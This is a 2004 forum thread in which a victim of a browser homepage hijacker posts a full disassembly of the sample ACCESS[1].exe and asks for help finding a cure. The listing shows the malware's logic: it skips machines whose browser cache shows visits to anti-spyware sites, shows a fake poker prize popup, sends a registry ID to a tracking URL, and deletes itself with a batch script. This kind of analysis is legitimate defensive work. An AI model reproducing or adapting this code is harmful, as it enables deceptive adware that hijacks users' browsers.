ACCESS[1].exe decompiled

Discussion in 'adware, spyware & hijack cleaning' started by Quai, Apr 25, 2004.

Thread Status:
Not open for further replies.
  1. Quai

    Quai Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    1
    Hi people ;)

    Seems that I have fallen fowl to the mk:mad:MSITStore:C:\WINDOWS\start.chm::/start.html homepage hijacker!

    I managed to catch the ACCESS[1].exe file in action earlier on and took a copy of the file just incase somebody could make use of it in finding a cure.

    I doubt any sensible person would accept a dodgy .exe file from anybody, so I downloaded PE Explorer and decompiled the exe file. However, I really don't know what the logs actually mean so I am hoping somebody else can use them.

    If you want a copy of the file, or want me to do something to it so you can see the results....pm me


    • ;------------------------------------------------------------------------------
      ;
      ; Disassembly listing generated by PE Explorer version 1.94
      ;
      ;------------------------------------------------------------------------------
      ;
      ; Name: .text (Code Section)
      ; Virtual Address: 00401000h Virtual Size: 00000BB0h
      ; Pointer To RawData: 00000200h Size Of RawData: 00000C00h
      ;
      ADVAPI32.dll!RegOpenKeyExA:
      dd ??
      ADVAPI32.dll!RegCloseKey:
      dd ??
      ADVAPI32.dll!RegQueryValueExA:
      dd ??
      dd 00000000
      KERNEL32.dll!GetTickCount:
      dd ??
      KERNEL32.dll!lstrlenA:
      dd ??
      KERNEL32.dll!GetTempPathA:
      dd ??
      KERNEL32.dll!GetEnvironmentVariableA:
      dd ??
      KERNEL32.dll!GetModuleFileNameA:
      dd ??
      KERNEL32.dll!lstrcatA:
      dd ??
      KERNEL32.dll!lstrcpyA:
      dd ??
      KERNEL32.dll!WriteFile:
      dd ??
      KERNEL32.dll!CreateFileA:
      dd ??
      KERNEL32.dll!Sleep:
      dd ??
      KERNEL32.dll!HeapAlloc:
      dd ??
      KERNEL32.dll!GetProcessHeap:
      dd ??
      KERNEL32.dll!HeapFree:
      dd ??
      KERNEL32.dll!FindFirstFileA:
      dd ??
      KERNEL32.dll!FindClose:
      dd ??
      KERNEL32.dll!LoadLibraryA:
      dd ??
      KERNEL32.dll!GetProcAddress:
      dd ??
      KERNEL32.dll!CloseHandle:
      dd ??
      KERNEL32.dll!FreeLibrary:
      dd ??
      dd 00000000
      SHELL32.dll!ShellExecuteA:
      dd ??
      dd 00000000
      USER32.dll!GetKeyboardLayoutList:
      dd ??
      USER32.dll!MessageBoxA:
      dd ??
      dd 00000000
      L00401074:
      db 19h;
      db 05h;
      db 22h; '"'
      db 23h; '#'
      db 25h; '%'
      db 26h; '&'
      db 27h; '''
      db 00h;
      L0040107C:
      dd SSZ00401128_go****yourself_com
      dd SSZ0040111C_crutop_nu
      dd SSZ00401108_webmasterworld_com
      dd SSZ004010F8_dialerschutz_de
      dd SSZ004010E8_spywareinfo_
      dd SSZ004010D0_adultwebmasterinfo_com
      dd SSZ004010C0_boards_cexx_org
      dd SSZ004010B0_statsbank_com
      dd SSZ004010A4_tibsystems_
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      SSZ004010A4_tibsystems_:
      db 'tibsystems.',0
      SSZ004010B0_statsbank_com:
      db 'statsbank.com',0
      Align 4
      SSZ004010C0_boards_cexx_org:
      db 'boards.cexx.org',0
      SSZ004010D0_adultwebmasterinfo_com:
      db 'adultwebmasterinfo.com',0
      Align 4
      SSZ004010E8_spywareinfo_:
      db 'spywareinfo.',0
      Align 4
      SSZ004010F8_dialerschutz_de:
      db 'dialerschutz.de',0
      SSZ00401108_webmasterworld_com:
      db 'webmasterworld.com',0
      Align 4
      SSZ0040111C_crutop_nu:
      db 'crutop.nu',0
      Align 4
      SSZ00401128_go****yourself_com:
      db 'go****yourself.com',0
      Align 4
      SSZ0040113C_FindCloseUrlCache:
      db 'FindCloseUrlCache',0
      Align 4
      SSZ00401150_FindNextUrlCacheEntryA:
      db 'FindNextUrlCacheEntryA',0
      Align 4
      SSZ00401168_FindFirstUrlCacheEntryA:
      db 'FindFirstUrlCacheEntryA',0
      SSZ00401180_wininet_dll:
      db 'wininet.dll',0
      SSZ0040118C_COMSPEC:
      db 'COMSPEC',0
      L00401194:
      db 22h; '"'
      db 00h;
      db 00h;
      db 00h;
      L00401198:
      db 20h; ' '
      db 22h; '"'
      db 00h;
      db 00h;
      SSZ0040119C__bat:
      db '.bat',0
      Align 4
      L004011A4:
      db 2Fh; '/'
      db 63h; 'c'
      db 20h; ' '
      db 00h;
      SSZ004011A8__echo_off___start__echo____1__de:
      db '@echo off',0Dh,0Ah,':start',0Dh,0Ah,'echo > %1',0Dh,0Ah,'del %1',0Dh,0Ah,'if exist %1 goto start',0Dh,0Ah,'del %0',0Dh,0Ah,0
      Align 4
      SSZ004011F0_open:
      db 'open',0
      Align 4
      SSZ004011F8_http___www_master_search_com_top:
      db 'http://www.master-search.com/top/poppok.php?act=1&data=1&cid=',0
      Align 4
      SSZ00401238_SOFTWARE_Microsoft_Internet_Expl:
      db 'SOFTWARE\Microsoft\Internet Explorer\Main\Config',0
      Align 4
      L0040126C:
      db 63h; 'c'
      db 69h; 'i'
      db 64h; 'd'
      db 00h;
      SSZ00401270_The__3_5_MILLION_PRIZE_IS_READY_:
      db 'The $3.5 MILLION PRIZE IS READY NOW!!! Do you wish to apply for it with PartyPoker?',0Ah,'Note: by clicking YES you confirm, that you at least 21 yr. old.',0
      Align 4
      SSZ00401308_Internet_Explorer___3500000_for_:
      db 'Internet Explorer: $3500000 for Party Poker',0
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      SUB_L00401340:
      push ebx
      push esi
      push SSZ00401180_wininet_dll
      xor bl,bl
      call [KERNEL32.dll!LoadLibraryA]
      mov esi,eax
      test esi,esi
      jz L004013BE
      push edi
      mov edi,[KERNEL32.dll!GetProcAddress]
      push SSZ00401168_FindFirstUrlCacheEntryA
      push esi
      call edi
      push SSZ00401150_FindNextUrlCacheEntryA
      push esi
      mov [L00401914],eax
      call edi
      push SSZ0040113C_FindCloseUrlCache
      push esi
      mov [L00401910],eax
      call edi
      mov ecx,[L00401914]
      mov [L00401918],eax
      test ecx,ecx
      pop edi
      jz L004013BE
      mov ecx,[L00401910]
      test ecx,ecx
      jz L004013BE
      test eax,eax
      jz L004013BE
      call SUB_L00401460
      test al,al
      jz L004013BC
      call SUB_L004013D0
      test al,al
      jz L004013BC
      push esi
      mov bl,01h
      call [KERNEL32.dll!FreeLibrary]
      mov al,bl
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L004013BC:
      xor bl,bl
      L004013BE:
      push esi
      call [KERNEL32.dll!FreeLibrary]
      mov al,bl
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      SUB_L004013D0:
      push ebx
      push ebp
      push esi
      push edi
      mov edi,[USER32.dll!GetKeyboardLayoutList]
      push 00000000h
      push 00000000h
      call edi
      mov esi,eax
      test esi,esi
      jnz L004013ED
      pop edi
      pop esi
      pop ebp
      xor al,al
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L004013ED:
      lea eax,[00000000h+esi*4]
      push eax
      call SUB_L00401850
      mov ebp,eax
      add esp,00000004h
      test ebp,ebp
      jnz L0040140A
      pop edi
      pop esi
      pop ebp
      xor al,al
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L0040140A:
      push ebp
      push esi
      call edi
      cmp esi,eax
      jz L00401422
      L00401412:
      push ebp
      call SUB_L00401870
      add esp,00000004h
      xor al,al
      pop edi
      pop esi
      pop ebp
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      L00401422:
      xor ebx,ebx
      test esi,esi
      jle L00401450
      mov edi,ebp
      L0040142A:
      xor eax,eax
      mov ax,[edi]
      test al,al
      jz L00401448
      movsx ecx,al
      push ecx
      push L00401074
      call SUB_L004018E0
      add esp,00000008h
      test eax,eax
      jnz L00401412
      L00401448:
      inc ebx
      add edi,00000004h
      cmp ebx,esi
      jl L0040142A
      L00401450:
      push ebp
      call SUB_L00401870
      add esp,00000004h
      mov al,01h
      pop edi
      pop esi
      pop ebp
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      SUB_L00401460:
      push ecx
      push ebx
      push esi
      push edi
      push 00001000h
      call SUB_L00401850
      mov edi,eax
      add esp,00000004h
      test edi,edi
      jz L004014FD
      lea eax,[esp+0Ch]
      mov dword ptr [esp+0Ch],00001000h
      push eax
      push edi
      push 00000000h
      call [L00401914]
      mov ebx,eax
      test ebx,ebx
      jz L004014F4
      L00401497:
      mov eax,[L0040107C]
      mov esi,L0040107C
      test eax,eax
      jz L004014C2
      L004014A5:
      mov ecx,[esi]
      mov edx,[edi+04h]
      push ecx
      push edx
      call SUB_L00401890
      add esp,00000008h
      test eax,eax
      jnz L004014DD
      mov eax,[esi+04h]
      add esi,00000004h
      test eax,eax
      jnz L004014A5
      L004014C2:
      lea eax,[esp+0Ch]
      mov dword ptr [esp+0Ch],00001000h
      push eax
      push edi
      push ebx
      call [L00401910]
      test eax,eax
      jz L004014ED
      jmp L00401497
      L004014DD:
      push edi
      call SUB_L00401870
      add esp,00000004h
      xor al,al
      pop edi
      pop esi
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      L004014ED:
      push ebx
      call [L00401918]
      L004014F4:
      push edi
      call SUB_L00401870
      add esp,00000004h
      L004014FD:
      pop edi
      pop esi
      mov al,01h
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 16
      SUB_L00401510:
      mov eax,[esp+04h]
      sub esp,00000140h
      test eax,eax
      jz L00401544
      cmp byte ptr [eax],00h
      jz L00401544
      lea ecx,[esp+00h]
      push ecx
      push eax
      call [KERNEL32.dll!FindFirstFileA]
      cmp eax,FFFFFFFFh
      jz L00401544
      push eax
      call [KERNEL32.dll!FindClose]
      mov al,01h
      add esp,00000140h
      retn
      ;------------------------------------------------------------------------------
      L00401544:
      xor al,al
      add esp,00000140h
      retn
      ;------------------------------------------------------------------------------
      Align 4
      SUB_L00401550:
      push ecx
      push ebx
      mov ebx,[esp+0Ch]
      push ebp
      push esi
      push edi
      push ebx
      push 00000104h
      call [KERNEL32.dll!GetTempPathA]
      mov esi,[KERNEL32.dll!lstrlenA]
      push ebx
      call esi
      mov edi,eax
      mov eax,[esp+20h]
      add edi,ebx
      test eax,eax
      mov [esp+10h],edi
      jz L0040158A
      push eax
      call esi
      mov [esp+18h],eax
      lea ebp,[eax+edi]
      jmp L0040159F
      L0040158A:
      mov dword ptr [esp+18h],00000000h
      mov eax,[esp+18h]
      lea ebp,[eax+edi]
      jmp L0040159F
      L0040159B:
      mov edi,[esp+10h]
      L0040159F:
      mov esi,[esp+20h]
      test esi,esi
      jz L004015B9
      mov ecx,[esp+18h]
      mov edx,ecx
      shr ecx,02h
      rep movsd
      mov ecx,edx
      and ecx,00000003h
      rep movsb
      L004015B9:
      mov esi,ebp
      call [KERNEL32.dll!GetTickCount]
      mov ecx,00000004h
      L004015C6:
      mov dl,al
      and dl,0Fh
      add dl,61h
      mov [esi],dl
      inc esi
      shr eax,04h
      dec ecx
      jnz L004015C6
      mov eax,[esp+1Ch]
      lea ecx,[ebp+04h]
      push eax
      push ecx
      mov byte ptr [esi],00h
      call [KERNEL32.dll!lstrcpyA]
      push ebx
      call SUB_L00401510
      add esp,00000004h
      test al,al
      jnz L0040159B
      pop edi
      pop esi
      pop ebp
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      SUB_L00401600:
      sub esp,0000044Ch
      mov ecx,00000011h
      lea eax,[esp+4Ch]
      push esi
      push edi
      mov esi,SSZ004011A8__echo_off___start__echo____1__de
      lea edi,[esp+0Ch]
      rep movsd
      movsw
      push L004011A4
      push eax
      movsb
      call [KERNEL32.dll!lstrcpyA]
      push 00000000h
      lea ecx,[esp+5Bh]
      push SSZ0040119C__bat
      push ecx
      call SUB_L00401550
      add esp,0000000Ch
      lea edx,[esp+57h]
      push 00000000h
      push 00000080h
      push 00000004h
      push 00000000h
      push 00000000h
      push 40000000h
      push edx
      call [KERNEL32.dll!CreateFileA]
      mov esi,eax
      lea eax,[esp+08h]
      push 00000000h
      push eax
      lea ecx,[esp+14h]
      push 00000046h
      push ecx
      push esi
      call [KERNEL32.dll!WriteFile]
      push esi
      call [KERNEL32.dll!CloseHandle]
      mov esi,[KERNEL32.dll!lstrcatA]
      lea edx,[esp+54h]
      push L00401198
      push edx
      call esi
      lea eax,[esp+54h]
      push 00000200h
      push eax
      call [KERNEL32.dll!lstrlenA]
      mov edx,[esp+0000045Ch]
      lea ecx,[esp+eax+58h]
      push ecx
      push edx
      call [KERNEL32.dll!GetModuleFileNameA]
      lea eax,[esp+54h]
      push L00401194
      push eax
      call esi
      lea ecx,[esp+00000254h]
      push 00000200h
      push ecx
      push SSZ0040118C_COMSPEC
      call [KERNEL32.dll!GetEnvironmentVariableA]
      push 00000000h
      lea edx,[esp+58h]
      push L0040191C
      lea eax,[esp+0000025Ch]
      push edx
      push eax
      push 00000000h
      push 00000000h
      call [SHELL32.dll!ShellExecuteA]
      pop edi
      pop esi
      add esp,0000044Ch
      retn
      ;------------------------------------------------------------------------------
      Align 8
      ;------------------------------------------------------------------------------
      EntryPoint:
      call SUB_L00401340
      test al,al
      jz L0040179C
      push 0001D4C0h
      call [KERNEL32.dll!Sleep]
      push 00000004h
      push SSZ00401308_Internet_Explorer___3500000_for_
      push SSZ00401270_The__3_5_MILLION_PRIZE_IS_READY_
      push 00000000h
      call [USER32.dll!MessageBoxA]
      cmp eax,00000006h
      jnz L0040179C
      push ebx
      push esi
      push edi
      push 00000400h
      call SUB_L00401850
      push 00000400h
      mov edi,eax
      call SUB_L00401850
      push edi
      push L0040126C
      push SSZ00401238_SOFTWARE_Microsoft_Internet_Expl
      push 80000001h
      mov esi,eax
      call SUB_L004017B0
      mov ebx,[KERNEL32.dll!lstrcatA]
      add esp,00000018h
      push SSZ004011F8_http___www_master_search_com_top
      push esi
      call ebx
      push edi
      push esi
      call ebx
      push 00000000h
      push 00000000h
      push 00000000h
      push esi
      push SSZ004011F0_open
      push 00000000h
      call [SHELL32.dll!ShellExecuteA]
      push esi
      call SUB_L00401870
      push edi
      call SUB_L00401870
      add esp,00000008h
      pop edi
      pop esi
      pop ebx
      L0040179C:
      push 00000000h
      call SUB_L00401600
      add esp,00000004h
      xor eax,eax
      retn 0010h
      ;------------------------------------------------------------------------------
      Align 8
      SUB_L004017B0:
      push ecx
      mov ecx,[esp+0Ch]
      mov edx,[esp+08h]
      push ebx
      push ebp
      push esi
      lea eax,[esp+0Ch]
      push edi
      xor esi,esi
      push eax
      push 00000001h
      push esi
      push ecx
      push edx
      xor bl,bl
      mov [esp+24h],esi
      call [ADVAPI32.dll!RegOpenKeyExA]
      test eax,eax
      jnz L00401837
      mov edi,[esp+20h]
      mov ecx,[esp+10h]
      mov ebp,[ADVAPI32.dll!RegQueryValueExA]
      lea eax,[esp+1Ch]
      push eax
      push esi
      push esi
      push esi
      push edi
      push ecx
      mov [esp+34h],esi
      call ebp
      mov eax,[esp+1Ch]
      cmp eax,esi
      jz L00401837
      push eax
      call SUB_L00401850
      add esp,00000004h
      lea edx,[esp+1Ch]
      mov esi,eax
      mov eax,[esp+10h]
      push edx
      push esi
      push 00000000h
      push 00000000h
      push edi
      push eax
      call ebp
      test eax,eax
      jnz L0040182E
      mov ecx,[esp+24h]
      push esi
      push ecx
      call [KERNEL32.dll!lstrcpyA]
      mov bl,01h
      L0040182E:
      push esi
      call SUB_L00401870
      add esp,00000004h
      L00401837:
      mov eax,[esp+10h]
      test eax,eax
      jz L00401846
      push eax
      call [ADVAPI32.dll!RegCloseKey]
      L00401846:
      pop edi
      pop esi
      mov al,bl
      pop ebp
      pop ebx
      pop ecx
      retn
      ;------------------------------------------------------------------------------
      Align 4
      SUB_L00401850:
      mov eax,[esp+04h]
      push eax
      push 00000008h
      call [KERNEL32.dll!GetProcessHeap]
      push eax
      call [KERNEL32.dll!HeapAlloc]
      retn
      ;------------------------------------------------------------------------------
      Align 16
      SUB_L00401870:
      mov eax,[esp+04h]
      push eax
      push 00000000h
      call [KERNEL32.dll!GetProcessHeap]
      push eax
      call [KERNEL32.dll!HeapFree]
      retn
      ;------------------------------------------------------------------------------
      Align 16
      SUB_L00401890:
      push ebx
      push esi
      mov eax,[esp+0Ch]
      push edi
      mov edi,[esp+14h]
      cmp byte ptr [edi],00h
      jz L004018D9
      mov dl,[eax]
      test dl,dl
      jz L004018D7
      L004018A6:
      test dl,dl
      mov ecx,edi
      jz L004018CA
      mov esi,eax
      sub esi,edi
      L004018B0:
      mov dl,[ecx]
      test dl,dl
      jz L004018CA
      movsx ebx,[esi+ecx]
      movsx edx,dl
      sub ebx,edx
      jnz L004018CA
      mov dl,[esi+ecx+01h]
      inc ecx
      test dl,dl
      jnz L004018B0
      L004018CA:
      cmp byte ptr [ecx],00h
      jz L004018D9
      mov dl,[eax+01h]
      inc eax
      test dl,dl
      jnz L004018A6
      L004018D7:
      xor eax,eax
      L004018D9:
      pop edi
      pop esi
      pop ebx
      retn
      ;------------------------------------------------------------------------------
      Align 4
      SUB_L004018E0:
      mov ecx,[esp+04h]
      mov dl,[esp+08h]
      mov al,[ecx]
      test al,al
      jz L004018FA
      L004018EE:
      cmp al,dl
      jz L004018FA
      mov al,[ecx+01h]
      inc ecx
      test al,al
      jnz L004018EE
      L004018FA:
      push ebx
      mov bl,[ecx]
      xor eax,eax
      cmp bl,dl
      setnz al
      dec eax
      pop ebx
      and eax,ecx
      retn
      ;------------------------------------------------------------------------------
      Align 8
      L00401910:
      dd 00000000h
      L00401914:
      dd 00000000h
      L00401918:
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      L0040191C:
      db 00h;
      db 00h;
      db 00h;
      db 00h;
      dd 00001994h
      dd 00000000h
      dd 00000000h
      dd 00001B14h
      dd 00001010h
      dd 000019ECh
      dd 00000000h
      dd 00000000h
      dd 00001B48h
      dd 00001068h
      dd 00001984h
      dd 00000000h
      dd 00000000h
      dd 00001B86h
      dd 00001000h
      dd 000019E4h
      dd 00000000h
      dd 00000000h
      dd 00001BA4h
      dd 00001060h
      dd 00000000h
      dd 00000000h
      dd 00000000h
      dd 00000000h
      dd 00000000h
      dd 00001B62h
      dd 00001B54h
      dd 00001B72h
      dd 00000000h
      dd 00001A52h
      dd 00001A62h
      dd 00001A6Eh
      dd 00001A7Eh
      dd 00001A98h
      dd 00001AAEh
      dd 00001A46h
      dd 00001AC8h
      dd 00001AD4h
      dd 00001AE2h
      dd 00001AEAh
      dd 00001AF6h
      dd 00001B08h
      dd 00001A34h
      dd 00001A28h
      dd 00001A18h
      dd 00001A06h
      dd 00001ABAh
      dd 000019F8h
      dd 00000000h
      dd 00001B94h
      dd 00000000h
      dd 00001B22h
      dd 00001B3Ah
      dd 00000000h
      dw 00E5h
      db 'FreeLibrary',0
      dw 0189h
      db 'GetProcAddress',0
      db 00h
      dw 022Eh
      db 'LoadLibraryA',0
      db 00h
      dw 00C1h
      db 'FindClose',0
      dw 00C5h
      db 'FindFirstFileA',0
      db 00h
      dw 0398h
      db 'lstrcpyA',0
      db 00h
      dw 01BEh
      db 'GetTickCount',0
      db 00h
      dw 039Eh
      db 'lstrlenA',0
      db 00h
      dw 01B6h
      db 'GetTempPathA',0
      db 00h
      dw 0142h
      db 'GetEnvironmentVariableA',0
      dw 0165h
      db 'GetModuleFileNameA',0
      db 00h
      dw 038Fh
      db 'lstrcatA',0
      db 00h
      dw 002Ch
      db 'CloseHandle',0
      dw 0376h
      db 'WriteFile',0
      dw 004Ah
      db 'CreateFileA',0
      dw 0329h
      db 'Sleep',0
      dw 01EFh
      db 'HeapAlloc',0
      dw 018Bh
      db 'GetProcessHeap',0
      db 00h
      dw 01F5h
      db 'HeapFree',0
      db 00h
      db 'KERNEL32.dll',0
      db 00h
      dw 0123h
      db 'GetKeyboardLayoutList',0
      dw 01DCh
      db 'MessageBoxA',0
      db 'USER32.dll',0
      db 00h
      dw 01C8h
      db 'RegCloseKey',0
      dw 01E1h
      db 'RegOpenKeyExA',0
      dw 01EBh
      db 'RegQueryValueExA',0
      db 00h
      db 'ADVAPI32.dll',0
      db 00h
      dw 0098h
      db 'ShellExecuteA',0
      db 'SHELL32.dll',0
      ;------------------------------------------------------------------------------
      00000050h DUP (??)
      ;
      ;
      ;------------------------------------------------------------------------------
      ; Imports from KERNEL32.dll
      ;
      extrn GetTickCount
      extrn lstrlenA
      extrn GetTempPathA
      extrn GetEnvironmentVariableA
      extrn GetModuleFileNameA
      extrn lstrcatA
      extrn lstrcpyA
      extrn WriteFile
      extrn CreateFileA
      extrn Sleep
      extrn HeapAlloc
      extrn GetProcessHeap
      extrn HeapFree
      extrn FindFirstFileA
      extrn FindClose
      extrn LoadLibraryA
      extrn GetProcAddress
      extrn CloseHandle
      extrn FreeLibrary
      ;
      ; Imports from USER32.dll
      ;
      extrn GetKeyboardLayoutList
      extrn MessageBoxA
      ;
      ; Imports from ADVAPI32.dll
      ;
      extrn RegOpenKeyExA
      extrn RegCloseKey
      extrn RegQueryValueExA
      ;
      ; Imports from SHELL32.dll
      ;
      extrn ShellExecuteA
      ;
      ;------------------------------------------------------------------------------

    Hope someone will find this useful.

    Regards
     
    Last edited: Apr 25, 2004
  2. ArcdEvilz

    ArcdEvilz Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    2
    I noticed this hijack uses the wininet.dll . By default this dll is 585K and the one from this hijack is 475K. Im not sure how it works with the scope of the hijack but I replaced mine with the original one. This hijack is a booger someone find a fix.
     
Thread Status:
Not open for further replies.